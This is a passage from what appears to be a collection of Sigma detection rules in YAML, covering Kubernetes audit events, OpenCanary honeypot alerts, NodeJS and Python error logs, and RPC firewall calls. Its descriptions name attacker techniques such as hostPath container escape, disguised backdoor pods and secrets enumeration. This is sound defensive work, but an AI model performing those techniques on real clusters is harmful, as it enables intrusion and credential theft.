title: Kubernetes Events Deleted
id: 3132570d-cab2-4561-9ea6-1743644b2290
related:
- id: 225d8b09-e714-479c-a0e4-55e6f29adf35
type: derived
status: test
description: |
Detects when events are deleted in Kubernetes.
An adversary may delete Kubernetes events in an attempt to evade detection.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.defense-evasion
- attack.t1070
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'delete'
objectRef.resource: 'events'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml
================================================
title: Potential Remote Command Execution In Pod Container
id: a1b0ca4e-7835-413e-8471-3ff2b8a66be6
status: test
description: |
Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1609
- attack.execution
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
objectRef.resource: 'pods'
objectRef.subresource: 'exec'
condition: selection
falsepositives:
- Legitimate debugging activity. Investigate the identity performing the requests and their authorization.
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml
================================================
title: Container With A hostPath Mount Created
id: 402b955c-8fe0-4a8c-b635-622b4ac5f902
status: test
description: |
Detects creation of a container with a hostPath mount.
A hostPath volume mounts a directory or a file from the node to the container.
Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/
- https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1611
- attack.privilege-escalation
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
objectRef.resource: 'pods'
hostPath: '*' # Note: Add the "exists" when it's implemented in SigmaHQ/Aurora
condition: selection
falsepositives:
- The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace.
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml
================================================
title: Creation Of Pod In System Namespace
id: a80d927d-ac6e-443f-a867-e8d6e3897318
status: test
description: |
Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.
System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.
Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.
Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.defense-evasion
- attack.t1036.005
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
objectRef.resource: 'pods'
objectRef.namespace: kube-system
condition: selection
falsepositives:
- System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml
================================================
title: Privileged Container Deployed
id: c5cd1b20-36bb-488d-8c05-486be3d0cb97
status: test
description: |
Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks.
A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.
Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/
- https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer
- https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html
- https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1611
- attack.privilege-escalation
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
objectRef.resource: 'pods'
capabilities: '*' # Note: Add the "exists" when it's implemented in SigmaHQ/Aurora
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml
================================================
title: RBAC Permission Enumeration Attempt
id: 84b777bd-c946-4d17-aa2e-c39f5a454325
status: test
description: |
Detects identities attempting to enumerate their Kubernetes RBAC permissions.
In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.
In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command.
This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
references:
- https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1069.003
- attack.t1087.004
- attack.discovery
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
apiGroup: 'authorization.k8s.io'
objectRef.resource: 'selfsubjectrulesreviews'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml
================================================
title: Kubernetes Rolebinding Modification
id: 10b97915-ec8d-455f-a815-9a78926585f6
related:
- id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e
type: similar
status: test
description: |
Detects when a Kubernetes Rolebinding is created or modified.
references:
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab
author: kelnage
date: 2024-07-11
tags:
- attack.privilege-escalation
logsource:
product: kubernetes
service: audit
detection:
selection:
objectRef.apiGroup: 'rbac.authorization.k8s.io'
objectRef.resource:
- 'clusterrolebindings'
- 'rolebindings'
verb:
- 'create'
- 'delete'
- 'patch'
- 'replace'
- 'update'
condition: selection
falsepositives:
- Modifying a Kubernetes Rolebinding may need to be done by a system administrator.
- Automated processes may need to take these actions and may need to be filtered.
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml
================================================
title: Kubernetes Secrets Enumeration
id: eeb3e9e1-b685-44e4-9232-6bb701f925b5
related:
- id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c
type: derived
status: test
description: Detects enumeration of Kubernetes secrets.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1552.007
- attack.credential-access
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'list'
objectRef.resource: 'secrets'
condition: selection
falsepositives:
- The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml
================================================
title: Kubernetes Secrets Modified or Deleted
id: 58d31a75-a4f8-4c40-985b-373d58162ca2
related:
- id: 2f0bae2d-bf20-4465-be86-1311addebaa3
type: similar
status: test
description: |
Detects when Kubernetes Secrets are Modified or Deleted.
references:
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/
author: kelnage
date: 2024-07-11
tags:
- attack.credential-access
logsource:
product: kubernetes
service: audit
detection:
selection:
objectRef.resource: 'secrets'
verb:
- 'create'
- 'delete'
- 'patch'
- 'replace'
- 'update'
condition: selection
falsepositives:
- Secrets being modified or deleted may be performed by a system administrator.
- Automated processes may need to take these actions and may need to be filtered.
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml
================================================
title: New Kubernetes Service Account Created
id: e31bae15-83ed-473e-bf31-faf4f8a17d36
related:
- id: 12d027c3-b48c-4d9d-8bb6-a732200034b2
type: derived
status: test
description: |
Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.persistence
- attack.t1136
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'create'
objectRef.resource: 'serviceaccounts'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml
================================================
title: Potential Sidecar Injection Into Running Deployment
id: ad9012a6-e518-4432-9890-f3b82b8fc71f
status: test
description: |
Detects attempts to inject a sidecar container into a running deployment.
A sidecar container is an additional container within a pod, that resides alongside the main container.
One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation.
By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.
references:
- https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1609
- attack.execution
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'patch'
apiGroup: 'apps'
objectRef.resource: 'deployments'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml
================================================
title: Kubernetes Unauthorized or Unauthenticated Access
id: 0d933542-1f1f-420d-97d4-21b2c3c492d9
status: test
description: |
Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.
This may indicate an attacker attempting to leverage credentials they have obtained.
references:
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues
author: kelnage
date: 2024-04-12
tags:
- attack.privilege-escalation
logsource:
product: kubernetes
service: audit
detection:
selection:
responseStatus.code:
- 401 # Unauthorized
- 403 # Forbidden
condition: selection
falsepositives:
- A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors.
level: low
================================================
FILE: rules/application/nodejs/nodejs_rce_exploitation_attempt.yml
================================================
title: Potential RCE Exploitation Attempt In NodeJS
id: 97661d9d-2beb-4630-b423-68985291a8af
status: test
description: Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: nodejs
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'node:child_process'
condition: keywords
falsepositives:
- Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable.
level: high
================================================
FILE: rules/application/opencanary/opencanary_ftp_login_attempt.yml
================================================
title: OpenCanary - FTP Login Attempt
id: 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5
status: test
description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.exfiltration
- attack.lateral-movement
- attack.t1190
- attack.t1021
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 2000
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_git_clone_request.yml
================================================
title: OpenCanary - GIT Clone Request
id: 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8
status: test
description: Detects instances where a GIT service on an OpenCanary node has had Git Clone request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.collection
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 16001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_http_get.yml
================================================
title: OpenCanary - HTTP GET Request
id: af6c3078-84cd-4c68-8842-08b76bd81b13
status: test
description: Detects instances where an HTTP service on an OpenCanary node has received a GET request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 3000
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_http_post_login_attempt.yml
================================================
title: OpenCanary - HTTP POST Login Attempt
id: af1ac430-df6b-4b38-b976-0b52f07a0252
status: test
description: |
Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 3001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_httpproxy_login_attempt.yml
================================================
title: OpenCanary - HTTPPROXY Login Attempt
id: 5498fc09-adc6-4804-b9d9-5cca1f0b8760
status: test
description: |
Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.defense-evasion
- attack.command-and-control
- attack.t1090
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 7001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_mssql_login_sqlauth.yml
================================================
title: OpenCanary - MSSQL Login Attempt Via SQLAuth
id: 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd
status: test
description: |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.credential-access
- attack.collection
- attack.t1003
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 9001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_mssql_login_winauth.yml
================================================
title: OpenCanary - MSSQL Login Attempt Via Windows Authentication
id: 6e78f90f-0043-4a01-ac41-f97681613a66
status: test
description: |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.credential-access
- attack.collection
- attack.t1003
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 9002
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_mysql_login_attempt.yml
================================================
title: OpenCanary - MySQL Login Attempt
id: e7d79a1b-25ed-4956-bd56-bd344fa8fd06
status: test
description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.credential-access
- attack.collection
- attack.t1003
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 8001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_ntp_monlist.yml
================================================
title: OpenCanary - NTP Monlist Request
id: 7cded4b3-f09e-405a-b96f-24248433ba44
status: test
description: Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.impact
- attack.t1498
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 11001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yaml
================================================
title: OpenCanary - NMAP FIN Scan
id: eae8c0c8-e5da-450a-9d7d-66aa56cd26b6
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5005
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_portscan_nmap_null_scan.yaml
================================================
title: OpenCanary - NMAP NULL Scan
id: 68b8547b-107f-43f3-97fb-900a7d63c190
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a NMAP NULL Scan
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5003
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_portscan_nmap_os_scan.yaml
================================================
title: OpenCanary - NMAP OS Scan
id: e8a677fd-248c-4eab-94df-de2f6f645884
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5002
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yaml
================================================
title: OpenCanary - NMAP XMAS Scan
id: d7553d7b-f485-479c-b192-cdac6edd83a4
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5004
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_portscan_syn_scan.yaml
================================================
title: OpenCanary - Host Port Scan (SYN Scan)
id: 974be8d2-283e-4033-ab08-7505b84204d0
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a SYN port scan.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_rdp_connection_attempt.yaml
================================================
title: OpenCanary - RDP New Connection Attempt
id: 598290cf-5932-45cd-9123-be1e05ab4f2e
status: experimental
description: Detects instances where an RDP service on an OpenCanary node has had a connection attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.initial-access
- attack.lateral-movement
- attack.t1133
- attack.t1021.001
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 14001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_redis_command.yml
================================================
title: OpenCanary - REDIS Action Command Attempt
id: 547dfc53-ebf6-4afe-8d2e-793d9574975d
status: test
description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.credential-access
- attack.collection
- attack.t1003
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 17001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_sip_request.yml
================================================
title: OpenCanary - SIP Request
id: e30de276-68ec-435c-ab99-ef3befec6c61
status: test
description: Detects instances where an SIP service on an OpenCanary node has had a SIP request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.collection
- attack.t1123
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 15001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_smb_file_open.yml
================================================
title: OpenCanary - SMB File Open Request
id: 22777c9e-873a-4b49-855f-6072ab861a52
status: test
description: Detects instances where an SMB service on an OpenCanary node has had a file open request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.lateral-movement
- attack.collection
- attack.t1021
- attack.t1005
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5000
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_snmp_cmd.yml
================================================
title: OpenCanary - SNMP OID Request
id: e9856028-fd4e-46e6-b3d1-10f7ceb95078
status: test
description: Detects instances where an SNMP service on an OpenCanary node has had an OID request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.discovery
- attack.lateral-movement
- attack.t1016
- attack.t1021
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 13001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_ssh_login_attempt.yml
================================================
title: OpenCanary - SSH Login Attempt
id: ff7139bc-fdb1-4437-92f2-6afefe8884cb
status: test
description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.initial-access
- attack.lateral-movement
- attack.persistence
- attack.t1133
- attack.t1021
- attack.t1078
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 4002
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_ssh_new_connection.yml
================================================
title: OpenCanary - SSH New Connection Attempt
id: cd55f721-5623-4663-bd9b-5229cab5237d
status: test
description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.initial-access
- attack.lateral-movement
- attack.persistence
- attack.t1133
- attack.t1021
- attack.t1078
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 4000
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_telnet_login_attempt.yml
================================================
title: OpenCanary - Telnet Login Attempt
id: 512cff7a-683a-43ad-afe0-dd398e872f36
status: test
description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.command-and-control
- attack.t1133
- attack.t1078
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 6001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_tftp_request.yml
================================================
title: OpenCanary - TFTP Request
id: b4e6b016-a2ac-4759-ad85-8000b300d61e
status: test
description: Detects instances where a TFTP service on an OpenCanary node has had a request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.exfiltration
- attack.t1041
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 10001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/opencanary/opencanary_vnc_connection_attempt.yml
================================================
title: OpenCanary - VNC Connection Attempt
id: 9db5446c-b44a-4291-8b89-fcab5609c3b3
status: test
description: Detects instances where a VNC service on an OpenCanary node has had a connection attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.lateral-movement
- attack.t1021
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 12001
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/application/python/app_python_sql_exceptions.yml
================================================
title: Python SQL Exceptions
id: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9
status: stable
description: Generic rule for SQL exceptions in Python according to PEP 249
references:
- https://www.python.org/dev/peps/pep-0249/#exceptions
author: Thomas Patzke
date: 2017-08-12
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: python
detection:
keywords:
- DataError
- IntegrityError
- ProgrammingError
- OperationalError
condition: keywords
falsepositives:
- Application bugs
level: medium
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml
================================================
title: Remote Schedule Task Lateral Movement via ATSvc
id: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb
status: test
description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.privilege-escalation
- attack.lateral-movement
- attack.execution
- attack.persistence
- attack.t1053
- attack.t1053.002
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
OpNum:
- 0
- 1
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml
================================================
title: Remote Schedule Task Recon via AtScv
id: f177f2bc-5f3e-4453-b599-57eefce9a59c
status: test
description: Detects remote RPC calls to read information about scheduled tasks via AtScv
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/zeronetworks/rpcfirewall
